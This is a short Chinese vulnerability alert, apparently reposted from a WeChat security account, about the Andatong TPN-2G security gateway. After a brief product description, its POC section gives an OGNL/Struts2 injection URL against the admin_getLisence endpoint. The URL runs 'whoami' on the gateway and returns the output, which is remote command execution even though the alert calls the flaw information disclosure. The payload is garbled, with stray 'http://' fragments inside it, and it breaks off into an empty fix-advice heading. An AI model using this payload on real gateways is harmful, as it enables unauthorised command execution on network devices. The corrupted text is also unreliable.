-
暂无
-
高危
安达通TPN-2G安全网关是一种网络安全产品,通常用于保护企业网络免受各种网络威胁的侵害。包括防火墙、入侵检测和防御系统、虚拟专用网络功能等,以确保网络通信的安全性和隐私保护。这样的安全网关通常提供了多种安全功能,以应对不同类型的网络攻击和威胁。
- 安达通TPN-2G安全网关
0x05 POC
{{url}}/lan/admin_getLisence?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%http://20java.io.InputStreamReader(%23a),%23c%3dnew%http://20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23screen.println(%23d),%23screen.close()}%22%3Etest.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22test%22}).start().getInputStream(),%23b%3dnew%http://20java.io.InputStreamReader(%23a),%23c%3dnew%20java0x06 修复建议
原文始发于微信公众号(浅安安全):漏洞预警 | 安达通TPN-2G安全网关信息泄露漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论